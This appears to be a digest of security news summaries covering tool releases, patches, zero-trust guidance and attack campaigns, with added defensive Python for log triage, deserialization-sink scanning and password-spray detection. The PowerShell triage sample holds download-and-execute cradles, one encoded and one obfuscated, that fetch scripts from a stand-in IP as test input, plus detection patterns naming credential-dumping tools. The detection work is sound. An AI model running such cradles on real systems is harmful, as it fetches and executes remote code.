Kali Linux 2025.2 released with 13 new tools, car hacking updates

Source: BleepingComputer

Author: Sergiu Gatlan

URL: https://www.bleepingcomputer.com/news/security/kali-linux-20252-released-with-13-new-tools-car-hacking-updates/

ONE SENTENCE SUMMARY: Kali Linux 2025.2 features a refreshed UI, expanded car hacking tools, new cybersecurity utilities, and enhanced Kali NetHunter support.

MAIN POINTS:

  1. Kali Linux 2025.2 released, adding 13 new cybersecurity tools.
  2. Car hacking toolkit renamed “CARsenal” with improved interface.
  3. New car hacking tools include hlcand, VIN Info, CaringCaribou, and ICSim.
  4. Kali Menu reorganized using MITRE ATT&CK framework for easier tool discovery.
  5. GNOME updated to version 48 with performance boosts and digital well-being tools.
  6. KDE Plasma 6.3 introduces better fractional scaling and improved CPU monitoring.
  7. Evince replaced by Papers app in GNOME for document viewing.
  8. Kali NetHunter adds wireless injection support on TicWatch Pro 3 smartwatch.
  9. NetHunter now runs Kali NetHunter KeX on Android Auto head units.
  10. New and updated NetHunter kernels available for Xiaomi, Realme, and Samsung devices.

TAKEAWAYS:

  1. Improved UI and menu structure make tool navigation easier for cybersecurity professionals.
  2. CARsenal toolkit offers comprehensive solutions for automotive security testing.
  3. GNOME and KDE updates deliver significant user experience and performance enhancements.
  4. Expanded Kali NetHunter capabilities broaden mobile and wearable penetration testing opportunities.
  5. Upgrading Kali Linux installations streamlined with clear instructions and commands.

NIST Outlines Real-World Zero-Trust Examples

Source: Dark Reading

Author: Fahmida Y. Rashid

URL: https://www.darkreading.com/endpoint-security/nist-outlines-real-world-zero-trust-examples

ONE SENTENCE SUMMARY: NIST’s new SP 1800-35 guidance provides practical examples and phased implementation strategies for organizations adopting end-to-end zero-trust architectures.

MAIN POINTS:

  1. NIST released SP 1800-35 guidance demonstrating real-world zero-trust architectures using commercial technologies.
  2. The guidance includes 19 practical example implementations developed over four years with 24 industry partners.
  3. SP 1800-35 builds upon NIST SP 800-207, moving from conceptual to practical ZTA implementation advice.
  4. Organizations must customize zero-trust deployments due to their unique network environments and security requirements.
  5. Zero-trust architectures continuously evaluate and verify access requests, removing implicit trust in users or devices.
  6. Implementing zero trust significantly reduces lateral movement and privilege escalation by malicious actors.
  7. NCCoE team installed, configured, and tested each example, providing troubleshooting assistance and best practices.
  8. Guidance aligns solutions with NIST Cybersecurity Framework and NIST SP 800-53 standards.
  9. Organizations should incrementally adopt foundational elements like identity management and multifactor authentication.
  10. Zero trust is an ongoing journey requiring continual adaptation to evolving threats, technologies, and organizational needs.

TAKEAWAYS:

  1. Leverage NIST’s practical examples to start customized zero-trust deployments.
  2. Begin ZTA implementation with a thorough inventory of existing organizational assets and capabilities.
  3. Formulate clear access policies based on least privilege and continuous verification principles.
  4. Incrementally implement ZTA components, starting with foundational security solutions.
  5. Continuously monitor and evolve zero-trust architectures to address changing threats and business requirements.

How to log and monitor PowerShell activity for suspicious scripts and commands

Source: CSO Online

Author: unknown

URL: https://www.csoonline.com/article/4006326/how-to-log-and-monitor-powershell-activity-for-suspicious-scripts-and-commands.html

ONE SENTENCE SUMMARY: A compromise of a consultant's workstation carried out with legitimate remote-access tools shows why PowerShell logging, attack surface reduction rules and tight control over remote-access software belong on every workstation that reaches into client environments.

MAIN POINTS:

  1. Consultants’ computers are attractive targets due to their access across multiple organizations.
  2. Recent attack involved installing Alpha Agent and updating Splashtop for remote access.
  3. Attackers employed legitimate tools and normal processes, avoiding antivirus detection.
  4. Entry point of the initial attack remains unknown.
  5. Adjust attack surface reduction rules to prevent common attack techniques.
  6. Enable PowerShell script block and module logging via Group Policy or Intune; script block logging records the de-obfuscated code as Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log.
  7. Regularly review logs for suspicious scripts, encoding, and obfuscation techniques.
  8. Microsoft Defender for Cloud can detect suspicious PowerShell and script activities.
  9. Maintain awareness of authorized remote access tools and restrict unauthorized ones.
  10. Monitor consultant workstations closely to detect abnormal activities quickly.

TAKEAWAYS:

  1. Tighten security rules to block execution of potentially malicious scripts.
  2. Enable detailed PowerShell logging on all critical workstations.
  3. Regularly analyze logs for unusual activities or attempts to harvest credentials.
  4. Clearly document approved remote access tools and restrict unauthorized installations.
  5. Increase monitoring and alerts specifically on consultant machines accessing internal resources.
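
Once script block logging is on, the review step in points 6 and 7 is a triage over exported 4104 events. The following is an added example, not code from the CSO article: it decodes anything passed through -EncodedCommand (base64 of UTF-16LE), scores each script block against a small indicator list (download cradles, Invoke-Expression, hidden-window switches, backtick and char-code obfuscation, credential-dumping names) and ranks the hits. The indicator weights and the three sample events are constructed for the example; a real deployment would feed it the ScriptBlockText field exported from the event log or SIEM.

```python
"""Triage exported PowerShell script block log events (Event ID 4104 in
Microsoft-Windows-PowerShell/Operational) for encoded commands, obfuscation
and download cradles. The sample events at the bottom are constructed."""
import base64
import re

# (compiled regex, weight, label): markers that rarely appear in admin scripts
INDICATORS = [
    (re.compile(r"\biex\b|invoke-expression", re.I), 3, "invoke-expression"),
    (re.compile(r"frombase64string", re.I), 2, "base64-decode"),
    (re.compile(r"downloadstring|downloadfile|invoke-webrequest|net\.webclient", re.I), 3, "download-cradle"),
    (re.compile(r"-w(?:indowstyle)?\s+hidden|-nop(?:rofile)?\b|-noni(?:nteractive)?\b", re.I), 2, "stealth-switches"),
    (re.compile(r"\[char\]\s*\d+|-join\s*\(|\[convert\]::", re.I), 2, "char-code-or-join-obfuscation"),
    (re.compile(r"[a-z]`[a-z]`[a-z]", re.I), 2, "backtick-obfuscation"),
    (re.compile(r"-bxor\b", re.I), 2, "xor-decode"),
    (re.compile(r"mimikatz|sekurlsa|lsass|add-mppreference|-exclusionpath", re.I), 4, "credential-access-or-defense-evasion"),
]

# -EncodedCommand and the abbreviations PowerShell accepts, followed by a base64 blob
ENCODED_RE = re.compile(r"(?:-encodedcommand|-enc|-ec|-e)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_commands(text):
    """Return the UTF-16LE strings hidden behind -EncodedCommand in text."""
    decoded = []
    for blob in ENCODED_RE.findall(text):
        try:
            decoded.append(base64.b64decode(blob, validate=True).decode("utf-16-le"))
        except (ValueError, UnicodeDecodeError):
            pass  # not a real encoded command; the raw text is still scored
    return decoded


def score_script_block(text):
    """Score the raw text (blob replaced by a marker) plus everything it decodes to."""
    corpus = [ENCODED_RE.sub("-EncodedCommand [decoded]", text)] + decode_encoded_commands(text)
    score, labels = 0, []
    for pattern, weight, label in INDICATORS:
        if any(pattern.search(chunk) for chunk in corpus):
            score += weight
            labels.append(label)
    return score, labels


def triage(events, threshold=4):
    """events: dicts carrying the 4104 ScriptBlockText (and ScriptBlockId).
    Returns the suspicious events, highest score first, with decoded payloads."""
    hits = []
    for ev in events:
        text = ev.get("ScriptBlockText", "")
        score, labels = score_script_block(text)
        if score >= threshold:
            hits.append({"ScriptBlockId": ev.get("ScriptBlockId"), "score": score,
                         "labels": labels, "decoded": decode_encoded_commands(text)})
    return sorted(hits, key=lambda h: h["score"], reverse=True)


# Constructed sample: an encoded download cradle, a benign admin command,
# and a backtick-obfuscated cradle (198.51.100.0/24 is documentation space).
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')"
ENCODED = base64.b64encode(CRADLE.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"ScriptBlockId": "1", "ScriptBlockText": "powershell.exe -nop -w hidden -enc " + ENCODED},
    {"ScriptBlockId": "2", "ScriptBlockText": "Get-ChildItem C:\\Temp | Where-Object { $_.Length -gt 1MB }"},
    {"ScriptBlockId": "3", "ScriptBlockText": "i`e`x (Ne`w-Ob`ject Net.WebClient).DownloadString('http://198.51.100.7/b')"},
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit["ScriptBlockId"], hit["score"], hit["labels"], hit["decoded"])
```

The decoded payload is scored alongside the raw command line because the indicators that matter (the cradle, Invoke-Expression) only appear after decoding, while the stealth switches only appear before it; scoring both catches attackers who hide either half.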

Hunting Deserialization Vulnerabilities With Claude

Source: TrustedSec

Author: James Williams

URL: https://trustedsec.com/blog/hunting-deserialization-vulnerabilities-with-claude

ONE SENTENCE SUMMARY: This post shows how to give Claude a .NET disassembler through the Model Context Protocol (MCP) so it can hunt for previously unknown (zero-day) deserialization vulnerabilities in compiled .NET assemblies.

MAIN POINTS:

  1. Model Context Protocol (MCP) lets Claude call a local disassembler against .NET assemblies instead of reasoning only over code pasted into the prompt.
  2. Setup consists of running an MCP server that exposes the disassembly tooling and connecting Claude to it.
  3. The bug class hunted is insecure deserialization, where attacker-controlled data reaches a .NET deserializer.
  4. "Zero-day" here means flaws not previously known, found in compiled code rather than in source.
  5. Disassembling the assemblies exposes the code paths that lead from input handling into deserialization calls.
  6. With the tool available, Claude can work through large assemblies systematically rather than one snippet at a time.
  7. The quality of the analysis depends on the MCP setup: the tool has to load and disassemble the right assemblies.
  8. Following calls across types and referenced assemblies requires an understanding of .NET assembly structure.
  9. The MCP-driven approach streamlines candidate identification; each candidate still needs to be confirmed reachable and exploitable.
  10. The same workflow turns assembly analysis into a repeatable part of a security assessment of closed-source .NET software.

TAKEAWAYS:

  1. MCP is a practical way to point Claude at compiled .NET software and look for unknown deserialization flaws.
  2. Getting the disassembler tooling set up correctly is a prerequisite for useful results.
  3. Analysis at the assembly level reaches code that source-only review cannot.
  4. Familiarity with .NET assembly internals significantly improves zero-day research outcomes.
  5. Treat model output as candidate findings and verify exploitability before reporting.
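
A first-pass filter a reviewer would run over decompiled output before (or while) asking a model to reason about it, as an added example that is not code from the TrustedSec post: it scans decompiled C# for the .NET deserializers that are unsafe on untrusted input (BinaryFormatter, SoapFormatter, NetDataContractSerializer, LosFormatter, ObjectStateFormatter), for Json.NET calls made with a TypeNameHandling setting other than None, and for JavaScriptSerializer configured with SimpleTypeResolver, and records whether the argument fed to the sink looks like it came from outside the process. The sample source, the taint-hint word list and the output format are constructed for the example; the regexes are line-based and will miss multi-line calls.

```python
"""Static triage of decompiled C# for insecure deserialization sinks, the kind
of check to run over a .NET decompiler's output before (or alongside) asking a
model to reason about it. The sample source is constructed."""
import re

# Deserializers unsafe on untrusted input regardless of configuration.
UNSAFE_FORMATTERS = ("BinaryFormatter", "SoapFormatter", "NetDataContractSerializer",
                     "LosFormatter", "ObjectStateFormatter")
_TYPES = "|".join(UNSAFE_FORMATTERS)
DECL_RE = re.compile(r"\b(" + _TYPES + r")\s+(\w+)\s*=")                                # BinaryFormatter f = ...
INLINE_RE = re.compile(r"new\s+(" + _TYPES + r")\s*\(\s*\)\s*\.Deserialize\s*\((.*)\)")  # new BinaryFormatter().Deserialize(x)
CALL_RE = re.compile(r"\b(\w+)\.Deserialize\s*\((.*)\)")                                # f.Deserialize(x)

# Json.NET is only dangerous when TypeNameHandling allows polymorphic types.
JSON_SETTINGS_RE = re.compile(r"JsonSerializerSettings\s+(\w+)\s*=.*TypeNameHandling\.(?:All|Auto|Objects|Arrays)")
JSON_CALL_RE = re.compile(r"JsonConvert\.DeserializeObject(?:<[^>]*>)?\s*\((.*)\)")
# JavaScriptSerializer resolves arbitrary types only when given SimpleTypeResolver.
RESOLVER_RE = re.compile(r"new\s+SimpleTypeResolver\s*\(")

# Names that suggest the bytes came from outside the process (crude taint hint).
TAINT_HINTS = re.compile(r"request|httpcontext|stream|body|input|payload|cookie|upload", re.I)


def _finding(lineno, sink, argument):
    return {"line": lineno, "sink": sink, "argument": argument.strip(),
            "tainted": bool(TAINT_HINTS.search(argument))}


def find_sinks(source):
    """Scan decompiled C# and return deserialization sinks with the argument
    fed to them and a hint whether that argument looks attacker-controlled."""
    findings, formatter_vars, json_vars = [], {}, set()
    for lineno, line in enumerate(source.splitlines(), 1):
        for ftype, var in DECL_RE.findall(line):
            formatter_vars[var] = ftype          # remember which variables hold unsafe formatters
        json_vars.update(JSON_SETTINGS_RE.findall(line))

        m = INLINE_RE.search(line)
        if m:
            findings.append(_finding(lineno, m.group(1) + ".Deserialize", m.group(2)))
        m = CALL_RE.search(line)
        if m and m.group(1) in formatter_vars:
            findings.append(_finding(lineno, formatter_vars[m.group(1)] + ".Deserialize", m.group(2)))
        m = JSON_CALL_RE.search(line)
        if m and any(re.search(r"\b%s\b" % re.escape(v), m.group(1)) for v in json_vars):
            findings.append(_finding(lineno, "JsonConvert.DeserializeObject[TypeNameHandling]", m.group(1)))
        if RESOLVER_RE.search(line):
            findings.append(_finding(lineno, "JavaScriptSerializer[SimpleTypeResolver]", line))
    return findings


# Constructed decompiled snippet: one BinaryFormatter sink fed from the request,
# one safe Json.NET call, one Json.NET call with TypeNameHandling.Auto.
SAMPLE_SOURCE = """\
public object LoadState(HttpRequest request)
{
    byte[] data = Convert.FromBase64String(request.Form["state"]);
    BinaryFormatter formatter = new BinaryFormatter();
    using (MemoryStream stream = new MemoryStream(data))
    {
        return formatter.Deserialize(stream);
    }
}

public Settings LoadSettings(string path)
{
    return JsonConvert.DeserializeObject<Settings>(File.ReadAllText(path));
}

public object LoadObject(string payload)
{
    JsonSerializerSettings settings = new JsonSerializerSettings { TypeNameHandling = TypeNameHandling.Auto };
    return JsonConvert.DeserializeObject(payload, settings);
}
"""

if __name__ == "__main__":
    for f in find_sinks(SAMPLE_SOURCE):
        print(f)
```

The Json.NET rule deliberately does not flag the LoadSettings call: DeserializeObject without TypeNameHandling is not a gadget-chain sink, and flagging every JSON parse would bury the two real findings. Reachability of the tainted argument is what the model (or the analyst) then has to establish from the disassembly.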

GitLab patches high severity account takeover, missing auth issues

Source: BleepingComputer

Author: Sergiu Gatlan

URL: https://www.bleepingcomputer.com/news/security/gitlab-patches-high-severity-account-takeover-missing-auth-issues/

ONE SENTENCE SUMMARY:

GitLab released patches for high-severity vulnerabilities allowing account takeover, malicious CI/CD job injection, and denial of service.

MAIN POINTS:

  1. GitLab issued security updates for Community and Enterprise editions 18.0.2, 17.11.4, and 17.10.8.
  2. CVE-2025-4278 vulnerability allows attackers to hijack accounts through HTML injection.
  3. CVE-2025-5121 flaw permits malicious CI/CD job injection into future project pipelines.
  4. CVE-2025-2254 addresses a cross-site scripting vulnerability affecting legitimate user sessions.
  5. CVE-2025-0673 fixes a denial-of-service issue involving infinite redirect loops and memory exhaustion.
  6. GitLab.com and Dedicated customers already have the security patches applied.
  7. GitLab strongly urges immediate upgrades for all self-managed installations.
  8. Attackers exploiting CVE-2025-5121 require authenticated access to GitLab Ultimate licensed instances.
  9. Recent breaches affected Europcar Mobility Group and Pearson through compromised GitLab repositories.
  10. GitLab platform serves over 30 million users, including half of Fortune 100 companies.

TAKEAWAYS:

  1. Immediately upgrade self-managed GitLab instances to patched versions.
  2. Ensure strict authentication and access controls, especially for GitLab Ultimate environments.
  3. Recognize the high-value target GitLab represents due to sensitive information in repositories.
  4. Regularly monitor GitLab security advisories to respond swiftly to emerging threats.
  5. Automate patching processes to streamline security updates and reduce administrative overhead.

Over 80,000 Microsoft Entra ID Accounts Targeted Using Open-Source TeamFiltration Tool

Source: The Hacker News

Author: info@thehackernews.com (The Hacker News)

URL: https://thehackernews.com/2025/06/over-80000-microsoft-entra-id-accounts.html

ONE SENTENCE SUMMARY: Proofpoint tracks a campaign abusing the open-source TeamFiltration penetration-testing framework to target more than 80,000 Microsoft Entra ID accounts with user enumeration and password spraying.

MAIN POINTS:

  1. New ATO campaign named UNK_SneakyStrike targets Microsoft Entra ID user accounts.
  2. Attackers leveraged open-source framework TeamFiltration, originally for penetration testing.
  3. Over 80,000 user accounts targeted across hundreds of cloud tenants since December 2024, with several successful takeovers.
  4. Microsoft Teams API and AWS servers were utilized to perform attacks.
  5. Primary attack methods include password spraying, user enumeration, and data exfiltration.
  6. Malicious files were uploaded to victims’ Microsoft OneDrive accounts for persistent access.
  7. Attack waves originated from geographically dispersed AWS servers to evade detection.
  8. Top attacking regions were United States (42%), Ireland (11%), and Great Britain (8%).
  9. Attacks occurred in concentrated bursts followed by quiet periods of four to five days.
  10. Smaller cloud tenants experienced broad targeting, while larger tenants had selective targeting.

TAKEAWAYS:

  1. Security tools intended for protection can be weaponized by attackers.
  2. Organizations must monitor for abnormal login attempts and geographic patterns.
  3. Regularly review and tighten user account access and permissions in cloud environments.
  4. Implement proactive defenses such as multi-factor authentication to counteract password spraying.
  5. Remain vigilant about publicly available security frameworks being misused by threat actors.
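
Detection logic for the spraying and enumeration pattern described above, as an added example that is not part of the article or of TeamFiltration. It assumes sign-in records exported from the Entra ID sign-in log with the AADSTS result code of each attempt (50126 wrong password, 50034 account does not exist, 50074/50076 password accepted but MFA required, 0 success); the sample rows and the thresholds are constructed. Spraying shows up as many distinct users failing from one address with one or two attempts each, which is the opposite of a user mistyping a password, and the same records also reveal which names the attacker learned exist and which passwords were right even where MFA stopped the sign-in.

```python
"""Password-spray detection over Entra ID sign-in records. Sample rows are
constructed; the result codes are the AADSTS error codes Entra reports."""
from collections import defaultdict
from datetime import datetime, timedelta

INVALID_PASSWORD = 50126                # wrong password for an existing user
USER_NOT_FOUND = 50034                  # account does not exist: enumeration signal
PASSWORD_ACCEPTED = {0, 50074, 50076}   # success, or MFA was the only thing that stopped it


def load(rows):
    """rows: (ISO time, userPrincipalName, source IP, result code)."""
    return [{"time": datetime.fromisoformat(t), "user": u, "ip": ip, "code": c}
            for t, u, ip, c in rows]


def detect_spray(records, window=timedelta(minutes=10), min_users=5, max_per_user=3):
    """Per source IP, slide a time window over failed sign-ins and flag the
    spray pattern: many distinct users, few attempts each. For each flagged
    IP also report which names it learned do not exist and which passwords
    it got right, because those users need a reset even if MFA held."""
    by_ip = defaultdict(list)
    for r in records:
        by_ip[r["ip"]].append(r)
    alerts = []
    for ip, evs in by_ip.items():
        evs.sort(key=lambda r: r["time"])
        fails = [r for r in evs if r["code"] in (INVALID_PASSWORD, USER_NOT_FOUND)]
        best, start = None, 0
        for end in range(len(fails)):
            while fails[end]["time"] - fails[start]["time"] > window:
                start += 1                      # drop failures that fell out of the window
            attempts = defaultdict(int)
            for r in fails[start:end + 1]:
                attempts[r["user"]] += 1
            if len(attempts) >= min_users and max(attempts.values()) <= max_per_user:
                if best is None or len(attempts) > best["distinct_users"]:
                    best = {"ip": ip, "distinct_users": len(attempts),
                            "first": fails[start]["time"], "last": fails[end]["time"]}
        if best:
            best["enumerated_nonexistent"] = sorted({r["user"] for r in evs if r["code"] == USER_NOT_FOUND})
            best["password_accepted"] = sorted({r["user"] for r in evs if r["code"] in PASSWORD_ACCEPTED})
            alerts.append(best)
    return alerts


# Constructed sample: one spraying host (203.0.113.0/24 is documentation space)
# and one user at another address who simply mistyped a password twice.
SAMPLE = [
    ("2025-06-10T09:00:05", "amy@example.com",   "203.0.113.10", 50126),
    ("2025-06-10T09:00:21", "ben@example.com",   "203.0.113.10", 50126),
    ("2025-06-10T09:00:40", "ghost@example.com", "203.0.113.10", 50034),
    ("2025-06-10T09:01:02", "cara@example.com",  "203.0.113.10", 50126),
    ("2025-06-10T09:01:19", "dan@example.com",   "203.0.113.10", 50126),
    ("2025-06-10T09:01:35", "bob@example.com",   "203.0.113.10", 50076),
    ("2025-06-10T09:01:58", "eve@example.com",   "203.0.113.10", 50126),
    ("2025-06-10T09:02:13", "finn@example.com",  "203.0.113.10", 50126),
    ("2025-06-10T09:02:30", "gus@example.com",   "203.0.113.10", 50126),
    ("2025-06-10T09:05:00", "carol@example.com", "198.51.100.5", 50126),
    ("2025-06-10T09:05:20", "carol@example.com", "198.51.100.5", 50126),
    ("2025-06-10T09:05:45", "carol@example.com", "198.51.100.5", 0),
]

if __name__ == "__main__":
    for alert in detect_spray(load(SAMPLE)):
        print(alert)
```

Because the campaign rotated through AWS addresses, keying only on the source IP lets a distributed spray slip under min_users per address; grouping by ASN or by the TeamFiltration user agent in the same window is the obvious next step, and is left out here because the sample carries neither field.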

Microsoft Outlook to block more risky attachments used in attacks

Source: BleepingComputer

Author: Sergiu Gatlan

URL: https://www.bleepingcomputer.com/news/security/microsoft-outlook-to-block-more-risky-attachments-used-in-attacks/

ONE SENTENCE SUMMARY: Microsoft will block .library-ms and .search-ms attachments in Outlook starting July 2025 to counter phishing and malware threats.

MAIN POINTS:

  1. Microsoft expands Outlook’s blocked attachment list to include .library-ms and .search-ms files.
  2. The update applies to Outlook Web and the new Outlook for Windows starting July 2025.
  3. Attackers previously exploited .library-ms files in phishing campaigns targeting governments and companies.
  4. .search-ms protocol handler was exploited since June 2022 for phishing and malware delivery.
  5. Most organizations will not be affected due to rarity of these file types’ usage.
  6. Organizations relying on these file types must manually adjust allowed file type settings.
  7. Microsoft provides documentation to help Exchange Server administrators manage attachment security.
  8. Blocking these files is part of Microsoft’s larger strategy to eliminate exploited features.
  9. Microsoft previously disabled Office VBA macros, XLM macros, XLL add-ins, and ActiveX controls.
  10. VBScript support will also be discontinued by Microsoft starting April 2025.

TAKEAWAYS:

  1. Outlook security updates proactively block file types historically exploited by attackers.
  2. Organizations should review attachment policies to ensure operational continuity.
  3. Microsoft continues to remove legacy features to reduce security risks.
  4. Administrators can manually configure allowed file types to accommodate business requirements.
  5. Regularly reviewing Microsoft’s security documentation can help organizations stay informed and prepared.

Patch Tuesday – June 2025

Source: Rapid7 Cybersecurity Blog

Author: Adam Barnett

URL: https://www.rapid7.com/blog/post/2025/06/10/patch-tuesday-june-2025/

ONE SENTENCE SUMMARY:

Microsoft’s June 2025 Patch Tuesday addresses 67 vulnerabilities, including two notable zero-days and eight critical remote code execution flaws.

MAIN POINTS:

  1. Microsoft released patches for 67 vulnerabilities in June 2025 Patch Tuesday update.
  2. Only one vulnerability, CVE-2025-33053 (WebDAV RCE), is actively exploited in-the-wild.
  3. WebDAV vulnerability exploited by threat actor Stealth Falcon targeting Middle Eastern governments.
  4. Windows WebDAV implementation has been deprecated since November 2023, reducing default exposure risk.
  5. CVE-2025-33073 in Windows SMB Client is a publicly disclosed elevation of privilege vulnerability.
  6. Critical RCE vulnerability CVE-2025-33071 affects Windows KDC Proxy Service with exploitation considered likely.
  7. Three Office vulnerabilities (CVE-2025-47162, CVE-2025-47164, CVE-2025-47167) leverage Preview Pane for exploitation.
  8. Microsoft 365 Apps for Enterprise patches for critical Office vulnerabilities not yet available.
  9. Eight critical remote code execution vulnerabilities were disclosed, requiring immediate attention.
  10. Two browser vulnerabilities previously published separately are not included in the June 2025 totals.

TAKEAWAYS:

  1. Prioritize patching actively exploited WebDAV vulnerability CVE-2025-33053 immediately.
  2. Urgently address critical Windows KDC Proxy vulnerability CVE-2025-33071 on exposed servers.
  3. Monitor closely the SMB Client vulnerability CVE-2025-33073 due to public disclosure and potential exploitation.
  4. Understand Office Preview Pane vulnerabilities significantly increase exploitation risk.
  5. Keep aware of the delayed availability of patches for Microsoft 365 Apps for Enterprise.

How to use on-demand rotation for AWS KMS imported keys

Source: AWS Security Blog

Author: Jeremy Stieglitz

URL: https://aws.amazon.com/blogs/security/how-to-use-on-demand-rotation-for-aws-kms-imported-keys/

ONE SENTENCE SUMMARY:

AWS KMS now supports on-demand rotation of imported symmetric encryption key material, enabling compliance without changing key identifiers.

MAIN POINTS:

  1. AWS KMS introduces on-demand rotation for imported symmetric encryption key material (EXTERNAL origin).
  2. Previously, rotation required creating new keys and updating references; now identifiers remain constant.
  3. Imported keys can hold multiple key materials, rotating to the latest imported material on-demand.
  4. Ciphertext includes a key material identifier for automatic selection during decryption.
  5. API responses now include KeyMaterialId and CurrentKeyMaterialId for greater rotation transparency.
  6. Rotation process involves importing new key material, setting rotation state, and initiating rotation.
  7. AWS CLI and SDKs support on-demand key rotation, with new parameters for import-type.
  8. Imported keys uniquely offer immediate expiry and deletion capabilities for enhanced control.
  9. CloudTrail logging includes key material ID for improved auditability and compliance.
  10. Pricing is simplified with a base cost and capped additional rotation charges after two rotations.

TAKEAWAYS:

  1. Simplifies compliance and security audits through seamless, non-disruptive key rotation.
  2. Enhances transparency and auditability with new API response fields and detailed CloudTrail logs.
  3. Provides greater flexibility and control with immediate expiry and deletion of imported key material.
  4. Reduces operational overhead by maintaining unchanged key identifiers during rotation.
  5. Offers predictable costs by capping the additional rotation charge once a key has been rotated more than twice.
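
The rotation procedure from the main points, written out as an added example that is not code from the AWS post. It makes the KMS client a parameter: against boto3 it is boto3.client("kms") and the calls are GetParametersForImport, ImportKeyMaterial with ImportType=NEW_KEY_MATERIAL, and RotateKeyOnDemand, with the KeyMaterialId response field taken from the page's description; here it runs against a small in-memory model, constructed for the example, that reproduces the documented semantics (a key holds several materials, rotation makes the newest one current, ciphertext carries the material id so Decrypt picks the right one). The model's "wrap" and cipher are placeholders: against real KMS the key bytes must be RSA-OAEP-wrapped with the public key KMS returns, and KMS encrypts with AES-GCM.

```python
"""On-demand rotation of an AWS KMS key whose material was imported
(Origin=EXTERNAL): import the next material with ImportType=NEW_KEY_MATERIAL,
then RotateKeyOnDemand. The KMS client is injected, so the flow runs against
boto3.client("kms") or against the in-memory model below (constructed)."""
import os
import uuid
from itertools import cycle


def import_material(kms, key_id, wrap, material, import_type=None):
    """Fetch a wrapping key and import token, wrap the raw key bytes client
    side, and import. Against real KMS, wrap() must RSA-OAEP-SHA-256 wrap
    `material` with the returned PublicKey (openssl pkeyutl or the cryptography
    package); the plaintext key never crosses the API."""
    params = kms.get_parameters_for_import(KeyId=key_id,
                                           WrappingAlgorithm="RSAES_OAEP_SHA_256",
                                           WrappingKeySpec="RSA_4096")
    args = dict(KeyId=key_id, ImportToken=params["ImportToken"],
                EncryptedKeyMaterial=wrap(params["PublicKey"], material),
                ExpirationModel="KEY_MATERIAL_DOES_NOT_EXPIRE")
    if import_type:
        args["ImportType"] = import_type      # NEW_KEY_MATERIAL: a rotation candidate
    return kms.import_key_material(**args)["KeyMaterialId"]


def rotate_imported_key(kms, key_id, wrap, new_material):
    """Import new material and make it current; the key id does not change."""
    new_id = import_material(kms, key_id, wrap, new_material, import_type="NEW_KEY_MATERIAL")
    kms.rotate_key_on_demand(KeyId=key_id)
    return new_id


class ModelKms:
    """Toy stand-in for the KMS API surface used above (constructed)."""
    def __init__(self):
        self.materials = {}   # KeyMaterialId -> raw bytes, kept in import order
        self.current = None
        self.token = None

    def get_parameters_for_import(self, KeyId, WrappingAlgorithm, WrappingKeySpec):
        self.token = os.urandom(8)
        return {"ImportToken": self.token, "PublicKey": b"model-wrapping-key"}

    def import_key_material(self, KeyId, ImportToken, EncryptedKeyMaterial, ExpirationModel, ImportType=None):
        assert ImportToken == self.token, "import token must come from GetParametersForImport"
        material_id = str(uuid.uuid4())
        self.materials[material_id] = EncryptedKeyMaterial.removeprefix(b"wrapped:")  # toy unwrap
        if self.current is None:
            self.current = material_id     # the first import is current immediately
        return {"KeyId": KeyId, "KeyMaterialId": material_id}

    def rotate_key_on_demand(self, KeyId):
        self.current = list(self.materials)[-1]   # newest import becomes current
        return {"KeyId": KeyId}

    @staticmethod
    def _xor(data, key):                      # toy cipher; real KMS uses AES-GCM
        return bytes(a ^ b for a, b in zip(data, cycle(key)))

    def encrypt(self, KeyId, Plaintext):
        mid = self.current
        return {"CiphertextBlob": mid.encode() + b":" + self._xor(Plaintext, self.materials[mid]),
                "KeyMaterialId": mid}

    def decrypt(self, KeyId, CiphertextBlob):
        mid, body = CiphertextBlob.split(b":", 1)   # material id travels with the ciphertext
        return {"Plaintext": self._xor(body, self.materials[mid.decode()]), "KeyMaterialId": mid.decode()}


def demo(kms=None, key_id="alias/imported-demo"):
    """Encrypt before and after rotation; both ciphertexts must still decrypt."""
    kms = kms or ModelKms()
    wrap = lambda _public_key, material: b"wrapped:" + material   # toy wrap, for the model only
    first_id = import_material(kms, key_id, wrap, os.urandom(32))
    old_ct = kms.encrypt(KeyId=key_id, Plaintext=b"before rotation")["CiphertextBlob"]
    new_id = rotate_imported_key(kms, key_id, wrap, os.urandom(32))
    new_ct = kms.encrypt(KeyId=key_id, Plaintext=b"after rotation")
    return {
        "first_material_id": first_id,
        "new_material_id": new_id,
        "new_ciphertext_material_id": new_ct["KeyMaterialId"],
        "old_plaintext": kms.decrypt(KeyId=key_id, CiphertextBlob=old_ct)["Plaintext"],
        "new_plaintext": kms.decrypt(KeyId=key_id, CiphertextBlob=new_ct["CiphertextBlob"])["Plaintext"],
    }


if __name__ == "__main__":
    print(demo())
```

The point the model makes visible is why callers need no change: data encrypted under the first material decrypts after rotation because the material id is part of the ciphertext, while new encryptions pick up the rotated material and the CloudTrail record for each call carries that id.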

Critical Cisco ISE Auth Bypass Flaw Impacts Cloud Deployments on AWS, Azure, and OCI

Source: The Hacker News

Author: info@thehackernews.com (The Hacker News)

URL: https://thehackernews.com/2025/06/critical-cisco-ise-auth-bypass-flaw.html

ONE SENTENCE SUMMARY: Cisco issued critical patches addressing a static credential vulnerability in cloud-based Identity Services Engine deployments, allowing unauthorized access.

MAIN POINTS:

  1. Cisco released patches for critical vulnerability CVE-2025-20286 in Identity Services Engine (ISE).
  2. The flaw has a critical CVSS severity rating of 9.9 out of 10.
  3. Issue stems from improperly generated static credentials in cloud deployments.
  4. Affected platforms include AWS, Microsoft Azure, and Oracle Cloud Infrastructure (OCI).
  5. Exploitation allows attackers access to sensitive data and limited administrative tasks.
  6. Vulnerability affects cloud-based Primary Administration nodes only; on-premises nodes are safe.
  7. Credentials are identical across deployments of same Cisco ISE release and cloud platform.
  8. Exploit could allow attacker to disrupt services or change system configurations.
  9. Proof-of-concept exploit exists, but no evidence of malicious exploitation yet.
  10. Cisco recommends restricting administrator traffic or performing a factory reset as mitigation.

TAKEAWAYS:

  1. Immediately apply Cisco’s security patches to affected cloud deployments.
  2. Restrict administrative access to trusted sources to mitigate potential exploits.
  3. Consider resetting Cisco ISE passwords using provided command, despite configuration reset risks.
  4. Regularly monitor for unusual activity, given the availability of proof-of-concept exploit.
  5. Evaluate and plan migration strategies to unaffected software versions or on-premises nodes.

